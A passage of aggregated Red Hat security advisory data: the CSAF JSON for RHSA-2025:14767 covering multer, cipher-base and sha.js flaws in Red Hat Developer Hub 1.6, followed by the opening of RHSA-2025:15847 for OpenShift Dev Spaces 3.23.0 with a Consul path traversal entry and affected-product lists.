      "id": "RHSA-2025:14767",
      "initial_release_date": "2025-08-27T15:50:11+00:00",
      "revision_history": [
        {
          "date": "2025-08-27T15:50:11+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2025-08-27T15:50:38+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-03-25T00:37:01+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Developer Hub 1.6",
                "product": {
                  "name": "Red Hat Developer Hub 1.6",
                  "product_id": "Red Hat Developer Hub 1.6",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:rhdh:1.6::el9"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Developer Hub"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1.6.4-1756241191"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1.6.4-1756218204"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-operator-bundle@sha256%3A7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1.6.4-1756244632"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64 as a component of Red Hat Developer Hub 1.6",
          "product_id": "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64 as a component of Red Hat Developer Hub 1.6",
          "product_id": "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64 as a component of Red Hat Developer Hub 1.6",
          "product_id": "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.6"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-7338",
      "cwe": {
        "id": "CWE-248",
        "name": "Uncaught Exception"
      },
      "discovery_date": "2025-07-17T16:00:55.704118+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2381726"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A denial of service vulnerability was found in the Multer NPM library. This vulnerability allows an attacker to trigger a denial of service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, resulting in a process crash.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "multer: Multer Denial of Service",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-7338"
        },
        {
          "category": "external",
          "summary": "RHBZ#2381726",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2381726"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-7338",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-7338",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7338"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b",
          "url": "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b"
        },
        {
          "category": "external",
          "summary": "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p",
          "url": "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p"
        }
      ],
      "release_date": "2025-07-17T15:26:45.427000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-08-27T15:50:11+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:14767"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "multer: Multer Denial of Service"
    },
    {
      "cve": "CVE-2025-9287",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "discovery_date": "2025-08-20T22:00:53.821394+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2389932"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An improper input validation vulnerability was found in the cipher-base npm package. Missing input type checks in the polyfill of the Node.js `createHash` function result in invalid\u00a0value calculations,\u00a0hanging and\u00a0rewinding the\u00a0hash state, including\u00a0turning a tagged hash\u00a0into an untagged\u00a0hash, for malicious JSON-stringifyable\u00a0inputs.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "cipher-base: Cipher-base hash manipulation",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "RHBZ#2389932",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/cipher-base/pull/23",
          "url": "https://github.com/browserify/cipher-base/pull/23"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
          "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
        }
      ],
      "release_date": "2025-08-20T21:43:56.548000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-08-27T15:50:11+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:14767"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "cipher-base: Cipher-base hash manipulation"
    },
    {
      "cve": "CVE-2025-9288",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "discovery_date": "2025-08-20T23:00:56.263191+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2389980"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A vulnerability was found in sha.js, where the hashing implementation does not perform sufficient input type validation. The .update() function accepts arbitrary objects, including those with crafted length properties, which can alter the internal state machine of the hashing process. This flaw may result in unexpected behavior such as rewinding the hash state, producing inconsistent digest outputs, or entering invalid processing loops. The issue was introduced due to the reliance on JavaScript object coercion rules rather than enforcing strict buffer or string inputs.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "sha.js: Missing type checks leading to hash rewind and passing on crafted data",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability was marked as Important rather then Critical because while the lack of input type checks in sha.js allows for hash state rewinding, crafted collisions, and potential denial of service, the vulnerability requires highly specific crafted input objects that are unlikely to occur in typical real-world usage, especially since most applications pass well-formed strings or buffers to hashing functions. Moreover, the cryptographic breakages described, such as nonce reuse leading to private key extraction, are indirect and depend on downstream libraries misusing sha.js for sensitive operations without additional validation layers. As a result, the flaw significantly undermines correctness and robustness of the hashing API, but its exploitability in common production systems is constrained, which could justify viewing it as an Important vulnerability rather than a Critical one.\n\n\nThe flaw requires applications to pass attacker-controlled, non-standard JavaScript objects into hash.update(). Most real-world Node.js applications and libraries already use Buffer, TypedArray, or String inputs, which are unaffected. Furthermore, Node\u2019s built-in crypto module, which is widely adopted, enforces stricter type-checking and is not impacted. As a result, the vulnerability mainly threatens projects that (a) directly depend on sha.js for cryptographically sensitive operations, and (b) hash untrusted input without type validation.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
          "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-9288"
        },
        {
          "category": "external",
          "summary": "RHBZ#2389980",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389980"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-9288",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/sha.js/pull/78",
          "url": "https://github.com/browserify/sha.js/pull/78"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5",
          "url": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
        }
      ],
      "release_date": "2025-08-20T21:59:44.728000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-08-27T15:50:11+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:14767"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64",
            "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "sha.js: Missing type checks leading to hash rewind and passing on crafted data"
    }
  ]
}

RHSA-2025:15847

Vulnerability from csaf_redhat - Published: 2025-09-15 16:27 - Updated: 2026-05-29 18:40

Summary

Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.23.0 Release.

Severity

Important

Notes

Topic: Red Hat OpenShift Dev Spaces 3.23.0 has been released.

Details: Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development. The 3.23 release is based on Eclipse Che 7.107 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2. Users still using the v1 standard should migrate as soon as possible. https://devfile.io/docs/2.2.0/migrating-to-devfile-v2 Dev Spaces supports OpenShift EUS releases v4.14 and higher. Users are expected to update to supported OpenShift releases in order to continue to get Dev Spaces updates. https://access.redhat.com/support/policy/updates/openshift#crw

CVE-2024-10005

A vulnerability was found in HashiCorp Consul. Due to a lack of path normalization, URL paths in L7 traffic intentions can be exploited to bypass permissions defined in the intentions.

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Vendor Fix fix Workaround

Known not affected 50 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Workaround
